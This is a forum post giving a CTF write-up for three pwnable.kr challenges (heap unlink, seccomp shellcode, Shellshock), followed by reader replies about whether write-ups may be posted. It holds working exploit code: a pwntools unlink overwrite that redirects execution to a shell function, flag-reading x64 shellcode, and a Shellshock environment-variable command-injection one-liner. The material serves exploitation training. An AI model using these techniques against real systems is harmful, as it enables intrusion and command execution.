
[原创] pwnable.kr -- rest-of-toddler

aqs 活跃值
5
2018-1-9 17:18
2104

终于结束了考试,刷题模式再次开启T^T

先来一道简单的题目热下身

toddler unlink

description

Daddy! how can I exploit unlink corruption?

ssh unlink@pwnable.kr -p2222 (pw: guest)

what it does

❯ ./unlink 
here is stack address leak: 0xffc28534
here is heap address leak: 0x82a0410
now that you have leaks, get shell!
a

Here we have a stack address, a heap address and an input prompt.
Now the code:

/*
 * IDA pseudocode of the unlink challenge binary (32-bit).
 * Builds a three-node doubly linked list on the heap, leaks one stack
 * address and one heap address, then reads a line of user input with
 * gets() and hands heap2 to unlink().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int *v3; // ST04_4 -- never assigned in this listing; decompiler artefact for the register that carries unlink()'s second argument
  char *heap1; // [esp-14h] [ebp-14h]
  _DWORD *heap3; // [esp-10h] [ebp-10h]
  _DWORD *heap2; // [esp-Ch] [ebp-Ch]

  malloc(0x400u);                  /* result discarded; only shifts the heap layout */
  heap1 = (char *)malloc(0x10u);   /* three 16-byte user chunks, laid out back to back (see the dump below) */
  heap2 = malloc(0x10u);
  heap3 = malloc(0x10u);
  /* offset 0 = fd, offset 4 = bk:  heap1 <-> heap2 <-> heap3 */
  *(_DWORD *)heap1 = heap2;
  heap2[1] = heap1;
  *heap2 = heap3;
  heap3[1] = heap2;
  printf("here is stack address leak: %p\n", &heap1);   /* address of a main() local */
  printf("here is heap address leak: %p\n", heap1);     /* address of heap1's user data */
  puts("now that you have leaks, get shell!");
  /* gets() has no length bound.  heap1 holds 16 bytes and the write starts
   * 8 bytes in, so anything past 8 input bytes runs into heap2's chunk
   * header and then its fd/bk fields.  A bounded read (fgets with the
   * remaining size) would close this. */
  gets(heap1 + 8);
  unlink((int)heap2, v3);
  return 0;
}
/*
 * Unlinks the node a2 from the doubly linked list:
 *   a2->fd->bk = a2->bk;   a2->bk->fd = a2->fd;
 * a1 is unused.  Nothing checks that fd and bk still point at list nodes,
 * so once main()'s gets() has overwritten them both stores become
 * attacker-chosen 4-byte writes.  Hardened allocators refuse the unlink
 * unless fd->bk == P && bk->fd == P holds before writing.
 */
_DWORD *__cdecl unlink(int a1, int *a2)
{
  _DWORD *v2; // ST10_4  -- a2->bk
  int v3; // ST0C_4       -- a2->fd
  _DWORD *result; // eax

  v2 = (_DWORD *)a2[1];
  v3 = *a2;
  *(_DWORD *)(v3 + 4) = v2;   /* fd->bk = bk */
  result = v2;
  *v2 = v3;                   /* bk->fd = fd */
  return result;
}

嘛,这可以算做一个 unlink 的入门练习吧,模仿unlink 的操作
You have three chunks: heap1, which you can overwrite, and heap2, the chunk that will be unlinked.
So, 我们的目标就是通过改写 heap2 的 fd以及 bk 来控制执行流

0x804b408:      0x00000000      0x00000019      0x0804b428      0x00000000
0x804b418:      0x00000000      0x00000000      0x00000000      0x00000019
0x804b428:      0x0804b440      0x0804b410      0x00000000      0x00000000
0x804b438:      0x00000000      0x00000019      0x00000000      0x0804b428
0x804b448:      0x00000000      0x00000000      0x00000000      0x00000409

heap1 -- heap2 -- heap3

A shell function is given in the binary:

 

 

所以所需要做的就是控制执行流跳到 shell 函数即可

 

The pwn steps are as below:

write(shell_addr*2) in heap1
write( p32(0)+p32(0x19)) over heap2's header to prevent a crash
write(stack_leak+0x10-0x4) to heap2's fd # stack_leak+0x10 is the ebp
write(heap_leak+8+4) to heap2's bk # heap_leak is the addr of heap1

after unlink
main 函数的 esp 会被劫持到 heap_leak+8+4 的地方,也就是我们写入shell_addr 的地方
and after the ret executes, you get a shell

exp

from pwn import *

p=process("./unlink")   # local copy of the challenge binary; both leaks are parsed from its stdout

def pwn():
    """Parse the two addresses ./unlink prints and send the input described
    in the steps above (Python 2 / pwntools).  Byte order of the payload
    matters: it is written starting at heap1+8 by the gets() in main().
    """
    p.recvuntil("leak: ")
    stack_leak=p.recvline().strip()
    stack_leak=int(stack_leak,16)          # &heap1, a local in main()'s frame
    print p.recvuntil("leak: ")
    heap_leak=p.recvline().strip()
    heap_leak=int(heap_leak,16)            # heap1's user data
    p.info("heap_leak:stack_leak  "+hex(heap_leak)+":"+hex(stack_leak))
    shell_addr=0x80484EB                   # the shell function the text says the binary provides
    payload=p32(shell_addr)*2              # fills heap1+8 .. heap1+16
    payload+=p32(0)+p32(0x19)              # re-writes heap2's chunk header with its original values (see the dump above) so malloc bookkeeping is untouched
    payload+=p32(stack_leak+0x10-0x4)      # heap2->fd: unlink() stores bk at fd+4 = stack_leak+0x10
    payload+=p32(heap_leak+8+4)            # heap2->bk: unlink() stores fd at *bk, i.e. over the second shell_addr copy
    p.sendline(payload)
    p.interactive()

pwn()   # run against the process started above

toddler asm

description

❯ ./asm                                                                                                                                         ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode:

this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong

It seems that we need to send x64 shellcode that reads the flag file while running under the seccomp sandbox.

❯ seccomp-tools dump ./asm                                                                                                                      ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: a
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x06 0x00 0x40000000  if (A >= 0x40000000) goto 0010
 0004: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0009
 0005: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0009
 0006: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0009
 0007: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0009
 0008: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x06 0x00 0x00 0x00000000  return KILL

We can only use the read, write and open syscalls (the filter above also lets exit and exit_group through).

 

and the code

/*
 * IDA pseudocode of the asm challenge binary (x86-64).
 * Maps an RWX page at a fixed address, prefixes it with `stub`, appends
 * up to 0x3E8 bytes of user input, enters a chroot and the seccomp
 * sandbox, then jumps into the page.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *s; // ST18_8
  size_t v4; // rdx

  setvbuf(stdout, 0LL, 2, 0LL);   /* 2 = _IONBF */
  setvbuf(stdin, 0LL, 1, 0LL);    /* 1 = _IOLBF */
  puts("Welcome to shellcoding practice challenge.");
  puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
  puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
  puts("If this does not challenge you. you should play 'asg' challenge :)");
  /* prot 7 = READ|WRITE|EXEC, flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS:
   * a writable+executable page at a known address, i.e. no W^X and no ASLR for it */
  s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
  memset(s, 144, 0x1000uLL);      /* 0x90 = NOP; the whole page is a NOP sled */
  v4 = strlen(stub);              /* `stub` is defined elsewhere in the binary */
  memcpy(s, stub, v4);
  printf("give me your x64 shellcode: ", stub, argv);  /* extra arguments are a decompiler artefact */
  read(0, s + 46, 0x3E8uLL);      /* user bytes land 46 bytes in, after the stub; 46 + 0x3E8 stays inside the page */
  alarm(0xAu);                    /* 10-second wall-clock limit */
  chroot("/home/asm_pwn");        /* NOTE(review): no chdir() follows, so the working directory is left wherever it was */
  sandbox();                      /* presumably installs the seccomp filter dumped above */
  ((void (__fastcall *)(const char *))s)("/home/asm_pwn");  /* execute the page; rdi = the path string */
  return 0;
}

Okay, it is clear now.
You know the file name from /home/asm, but the real file is in /home/asm_pwn, which can only be reached through the binary (it chroot()s there).

 

Now, the exp using pwntools

#!/usr/bin/env python
#coding:utf-8
from pwn import *
import time
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)   # credentials as published in the challenge description
p = con.connect_remote('localhost', 9026)                               # the asm service on the box

context.arch='amd64'   # the binary executes x64 code (see its banner above)


# Assemble the shellcode from pwntools templates.  Only open/read/write are
# used, matching what the seccomp filter dumped above allows.
shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')   # push the NUL-terminated file name; rsp then points at it

shellcode += shellcraft.open('rsp', 0, 0)       # open the pushed file name read-only
shellcode += shellcraft.read('rax', 'rsp', 100) # rax holds the returned fd; read the contents onto the stack at rsp
shellcode += shellcraft.write(1, 'rsp', 100)    # write the buffer to stdout so it comes back over the connection


print p.recvuntil("shellcode:")   # wait for the prompt before sending

p.send(asm(shellcode))

print p.recv()
print p.recv()

toddler shellshock

description

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)

Well, you need to know about the Shellshock vulnerability first.

 

http://www.freebuf.com/articles/system/45390.html
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
You have two files

bash  shellshock

shellshock

/*
 * IDA pseudocode of the shellshock launcher.  Sets the real/effective/saved
 * uid and gid to the process's effective gid, then runs the bundled bash
 * through system().  Both setres* calls are fed getegid() values, so
 * setresuid() is handed a gid; the listing shows the binary as compiled.
 * system() goes through /bin/sh and passes the caller's environment on
 * unchanged, which is what lets exported-function strings reach the
 * bundled bash; a privileged launcher should reset its environment
 * before spawning anything.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __gid_t v3; // er12
  __gid_t v4; // ebx
  __gid_t v5; // eax
  __gid_t v6; // er12
  __gid_t v7; // ebx
  __gid_t v8; // eax

  v3 = getegid();
  v4 = getegid();
  v5 = getegid();
  setresuid(v5, v4, v3);   /* ruid = euid = suid = effective gid (as decompiled) */
  v6 = getegid();
  v7 = getegid();
  v8 = getegid();
  setresgid(v8, v7, v6);   /* rgid = egid = sgid = effective gid */
  system("/home/shellshock/bash -c 'echo shock_me'");   /* fixed command, but the inherited environment is not sanitised */
  return 0;
}

shellshock 会调用 bash binary
嘛,总之就是一个命令执行

exp

# An unpatched bash imports every environment variable that starts with "() {" as a
# function definition and keeps parsing past the closing brace, so the trailing
# command runs at start-up; patched builds import only the function body.
env x='() { :;}; /bin/cat flag' ./shellshock

memcpy



最新回复 (4)
ooOOOoomxw 活跃值 2018-1-9 18:23
支持一下。不过wargame这些最好不要发wp吧。  那个站不是也说了么    23333
aqs 活跃值 5 2018-1-9 20:38
oh,  有这回事??
aqs 活跃值 5 2018-1-9 20:44
Okay,  I  will  only  do  local  records.
返無歸一 活跃值 2018-1-10 15:03
pwnable.kr有说不能放writeup吗?我只记得pwnable.tw说不要放高分的writeup而已